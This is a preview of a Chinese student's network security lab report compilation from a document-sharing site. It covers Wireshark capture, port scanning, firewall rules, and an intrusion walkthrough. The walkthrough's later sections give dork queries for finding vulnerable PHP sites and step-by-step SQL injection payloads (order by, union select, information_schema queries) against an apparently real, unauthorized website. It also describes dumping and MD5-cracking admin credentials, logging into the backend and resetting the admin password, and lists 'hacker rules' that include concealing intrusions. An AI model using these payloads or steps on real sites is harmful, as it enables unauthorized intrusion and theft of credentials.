网络安全实验报告综合_第1页
网络安全实验报告综合_第2页
网络安全实验报告综合_第3页
网络安全实验报告综合_第4页
网络安全实验报告综合_第5页
已阅读5页,还剩29页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、网络扫描与网络嗅探一 实验目的(1) 理解网络嗅探和扫描器的工作机制和作用(2) 使用抓包与协议分析工具Wireshark(3) 掌握利用扫描器进行主动探测,收集目标信息的方法(4) 掌握使用漏洞扫描器检测远程或本地主机安全性漏洞二 实验环境Windows xp操作系统平台,局域网环境,网络抓包与协议分析工具Wireshark,扫描器软件:Superscan三 实验步骤l 使用Wireshark 抓包并进行协议分析(1)下载并安装软件,主界面如图1所示。图1(2)单击capture,打开interface接口选项,选择本地连接,如图2所示。图2(3)使用Wireshark数据报获取,抓取TCP

2、数据包并进行分析从抓取的数据包来看,首先关于本次分析的数据包是典型的TCP三次握手,如图3所示。图3(4)TCP三次握手过程分析(以第一次握手为例) 主机(172.16.1.64)发送一个连接请求到(172.16.0.1),第一个TCP包的格式如图4所示。图4第三行是ipv4的报文,网际协议IP是工作在网络层,也就是数据链路层的上层, IPv4报文中的源地址和目的地址是ip地址,版本号TCP是6,其格式为如图5所示。图5第四行是TCP报文,从上面两个可以知道,这个TCP包被层层包装,经过下面一层就相应的包装一层,第三段是经过传输层的数据,TCP报文的格式为如图6所示。图6TCP的源端口2804

3、也就是宿主机建立连接开出来的端口,目的端口8080。Sequence number同步序号,这里是0x3a 2a b7 bb,但这里显示的是相对值0。Acknowledgment number确认序号4bytes,为0,因为还是第一个握手包。Header Length头长度28字节,滑动窗口65535大小字节,校验和,紧急指针为0。Options选项8字节l 使用superscan 扫描(1) 下载并安装,如图7所示。图7(2)主界面如图8所示。图8(3)使用superscan对远程主机和本地主机进行端口扫描通过ping来检验IP是否在线:ping 172.16.1.64,显示结果如图9、图1

4、0所示。图9图10(4)单击port list setup进入如图11所示。图11(5)软件自带一个木马端口列表trojans.lst,通过这个列表我们可以检测目标计算机是否有木马,如图12所示。图12四 实验总结通过本次实验,我理解了网络嗅探的工作机制和作用,它可以用来窃听计算机在网络上所产生的众多的信息,可以窃听计算机程序在网络上发送和接收到的数据,用来接收在网络上传输的信息,并且掌握了常用的网络抓包与协议分析工具Wireshark的使用方法。同时也掌握了扫描器的工作机制和作用,以及利用扫描器进行主动探测,收集目标信息的方法。防火墙配置与应用实验一、实验目的n 掌握一般软件防火墙的使用与配

5、置。二、实验环境n 多台装有 Windows XP的计算机。n 提供防火墙软件(三、实验原理n 在计算机系统上,软件防火墙本身需要具有较高的抗攻击能力,一般设置于系统和网络协议的底层。访问与被访问的端口被设置严格的访问规则,以切断一切规则以外的网络连接。防火墙的安全防护性能是由防火墙、用户设置的规则和计算机系统本身共同保证的。四、实验要求n 在防火墙中监听各个应用程序使用端口的情况,即查看哪些程序使用了端口,使用哪个端口,是否存在可疑程序在使用网络资源。n 能够根据要求,自定义IP规则打开某些端口,使特定的应用程序正常使用。n 能够根据要求,自定义IP规则封锁某些端口,以此禁止某些IP访问自己

6、的计算机,从而达到安全的目的。五、实验步骤(以天网防火墙为例)1) 首先安装并打开天网防火墙。下面来介绍天网的一些简单设置,如图1所示是系统设置界面,可以参照此来设置。图12) 定义IP规则,这里是采用默认情况,如图2所示。图23) 下图是各个应用程序使用端口的情况,如图3所示。图3(4)下图就是日志,上面记录了程序访问网络的记录,局域网和互联网上被IP扫描端口的情况,如图4所示。图4 天网防火墙会把所有不合规则的数据包拦截并记录到日志中,如果选择了监视所有TCP和UDP数据包,那发送和接收的每个数据包都将被记录。如139端口攻击,139端口是NetBIOS协议所使用的端口,在安装了TCP/I

7、P 协议的同时,NetBIOS 也会被作为默认设置安装到系统中。(5)防火墙开放端口应用,打开68816889端口。 建立新的IP规则,如下图,在自定义IP规则里双击进行新规则设置,如图5所示。图5 设置新规则后,把规则上移到该协议组的置顶,并保存。然后可以进行在线端口测试,这些端口是否已经开放的,如图6所示。图6(6)应用自定义规则防止常见病毒。下面是防范冲击波病毒的实例应用,冲击波就是利用WINDOWS系统的RPC服务漏洞以及开放的69、135、139、445、4444端口入侵。 图7就是禁止4444端口的示意图。 图7 封锁69端口,如图8所示。图8 建立完后就保存,保存完后就可以防范冲

8、击波病毒了。六、实验总结 通过本次实验,我知道了一般软件防火墙的使用与配置。可以使用该软件监听各个应用程序使用端口的情况,查看哪些程序使用了端口,使用哪个端口,是否存在可疑程序在使用网络资源。通过新建IP规则,并且进行自定义,对某些端口进行封锁,以禁止某些IP访问自己的计算机,之后保存,可以通过此方法来保证计算机的安全。某网站重置密码漏洞及攻击实例一 实验目的(1) 理解网站攻击原理(2) 理解网络攻击时使用工具的原理(3) 熟练使用网站攻击工具二 实验环境u 操作系统 :Windows 8u 解密工具:MD5u 检测工具:啊Du 浏览器:2345王牌浏览器三 实验步骤(1) 寻找可以注入网站

9、网址:(2) 使用检测工具,啊D扫描注入点,显示如图1所示。图1(3)SQL注册检测,扫描表段,显示结果如图2所示。图2(4)从表段检测字段,检测结果如图3所示。图3(4)进一步检测内容,检测结果如图4所示。图4(5)对密码的密文进行MD5解密,使用链接:或者,解密结果显示如图5所示。图5(6)还礼入口检测,找到管理员登陆的网页链接,如图6所示。图6(7)打开链接输入“用户名称”和“用户密码”点击“确认”即可,如图7所示。图7(8)登陆后台显示如图8所示。图8(9)找到修改密码,即可重置管理员密码,显示界面如图9所示。但是极不建议你修改网站里面的任何内容。图9四 实验总结通过本次试验我深如理解

10、了对网站攻击的原理,对网络安全有了进一步的认识,以后如果自己建立网站,一定要多检测,多验证,保证网站的安全性。我体会到理论与实践结合是相当重要的,要真正的掌握一门学问和技术,仅仅靠书本上的知识是远远不够的,必须要从书本上升到实践,把理论融合到实践中去。这次实验,在很多方面我得到了提升,尤其是单独解决问题的能力。从这一点我深刻的认识到,我们一定要有一种能独立面对困难,挫折的能力,这样才能在陌生的领域中可以得到更好的发展的能力。SQL注入实例如果你想要入侵一个网站,那么你首先要知道你将要入侵的网站是哪一种类型的。方法是:打开一个网页,右键属性,从“地址(URL)”查看网站属于哪种类型。有五种类型的

11、网站页面URL标准。相关文档:演示实例是基于PHP类型的网站(一种在服务器端执行的嵌入HTML文档的脚本语言,主要用来连接动态数据库、制作动态网站。现在被很多网站编程人员广泛运用)地址:如果你想要试验一次,但是这个网站已经不能被修复的话,那么你可以搜索类似的网站。搜索语句可以是:inurl:index.php?id= 或inurl:show.php?id=下面是我找的一个例子,供大家参考:实验演示:第一步:寻找可以入侵的网站。方法是:打开PHP类型的网址,在注入点后加一个单引号()按回车。如果网页出错,那么该网站有漏洞。下面是我选的网站的截图比较,正常网页如图1所示,加()出现的错误网页如图2

12、所示。图1图2第二步:进一步验证此链接是可以注入的。(与运算)(1)在注入点后加“+and+1=1”页面显示正常,如图3所示。图3(2)在注入点后加“+and+1=0”,页面显示错误,如图4所示。图4第三步:获得字段数在注入点后面加入“+order+by+1”,页面显示正常,如图5所示。图5(2)注入点后面换成“+order+by+20”,出现错误界面,如图6所示。图6(3)用二分法进一步判断出现错误的字段数,再注入点后面换成:“+order+by+10”,“+order+by+5”,“+order+by+8”,“+order+by+9”,页面均显示正常,说明,正确的字段是1,2,3,4,5,

13、6,7,8,9。如图7所示。图7第四步:获得显示位再注入点后面加入“+and+1=2+union+select+1,2,3,4,5,6,7,8,9”,如图8所示,显示的数字即是显示位:2,4,7图8第五步:获得该网站数据库的名字、版本、数据库所在路径等下面是获得数据库信息的一些函数:user() 数据库用户名database() 当前使用的数据库名version() 数据库版本datadir()或datadir 数据库数据所在路径basedir()或basedir 数据库安装路径在出错的字段位置加上上面的函数,即可获得相对应的信息,如图9所示图9第六步:获得当前使用的数据库名的hex值,并暴漏

14、该网站数据库的字段名(1)数据库名的还原需要使用协助工具:小葵多功能转换工具,把当前使用的数据库名jmjt转化为:0x6A6D6A74,转换结果如图10所示。图10(2)注入点后面加下面的公式获得数据库的字段名:“+and+1=2+union+select+1,GROUP_CONCAT(DISTINCT+table_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_schema=0x6A6D6A74”(数据库表名的hex值)GROUP_CONCAT(DISTINCT+table_name)放在显示位即可获得相对应SQ

15、L数据库中的字段名,如图11所示。报表中的具体字段显示如图12。图11图12第七步:在所有的字段中找数据库管理员的用户名,并获得hex值找到管理员的字段名(管理员:administrator)猜测:这个很显然就判断是useradmin(大多数),因为大多数人都是admin、user、Pass等一些常用单词搭配一起标记。把管理员的字段名再次使用小葵多功能转换工具获得其hex值,如图13所示。图13第八步:借助管理员用户名的hex值,获得字段useradmin的子字段注入点后面加下面公式获得管理员的子字段:“+and+1=2+union+select+1,concat(GROUP_CONCAT(D

16、ISTINCT+column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x46D696E”(管理员用户名的hex值)concat(GROUP_CONCAT(DISTINCT+column_name)放在显示位获得的子字段显示如图14所示。图14第九步:从管理员的子字段中获得管理员的登陆账号和密码从上面的子字段中不难看出,子字段中有账号和密码,在注入点后面加上下面公式“+and+1=2+union+select+1,concat(Uname),3,concat(Upwd),5,6,7,8,9+fro

17、m+useradmin”获得管理员的登录名和密码如图15所示。图15第十步:进一步把十六进制显示的密码的密文进行解密使用下面的MD5解密工具的链接把密码的密文解密 ,使用网址:或者,把十六进制显示的密码的密文输入编辑查询框中进行查询,查询结果如图16所示。图16最后一步:使用“啊D”工具扫描后台,(1)打开“啊D”工具,点击“管理入口”进行扫描(2)找到管理员的登陆界面如图17所示,输入账号和密码可进入该网站的后台如图18所示。图17图18这样就是成功入侵了一个网站! 你可以上传图片、文章、视频等等。前台可以看到,这里我就不实现了。在后台你可以对网站管理员进行密码重置设置,但是建议你不要这么做

18、!入侵网站注意事项:1.不恶意破坏任何的系统,这样只会给你带来麻烦。恶意破坏他人的软件将导致法律责任,如果你只是使用电脑,那仅为非法使用!注意:千万不要破坏别人的软件或资料!2、不修改任何的系统档,如果你是为了要进入系统而修改它,请在达到目的后将它改回原状。3.不要轻易的将你要hack的站台告诉你不信任的朋友。4.不要在bbs上谈论你hack的任何事情。5.在post文章的时候不要使用真名。6.正在入侵的时候,不要随意离开你的电脑。7.不要在电话中谈论你hack的任何事情。8.将你的笔记放在安全的地方。9.想要成为hack就要学好编程和数学,以及一些TCPIP协议、系统原理、编译原理等知识!10.已侵入电脑中的帐号不得清除或涂改。11不得修改系统档案,如果为了隐藏自己的侵入而做的修改则不在此限,但仍须维持原来系统的安全性,不得因得到系统的控制权而将门户大开!12不将你已破解的帐号分享于你的朋友。13.不要侵入或破坏政府机关的主机。14.不会编程的黑客不是好黑客。15.黑客不同于“盗”16.最重要的一点,不要入侵有关政府的网站实验总结:1、此次的课

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论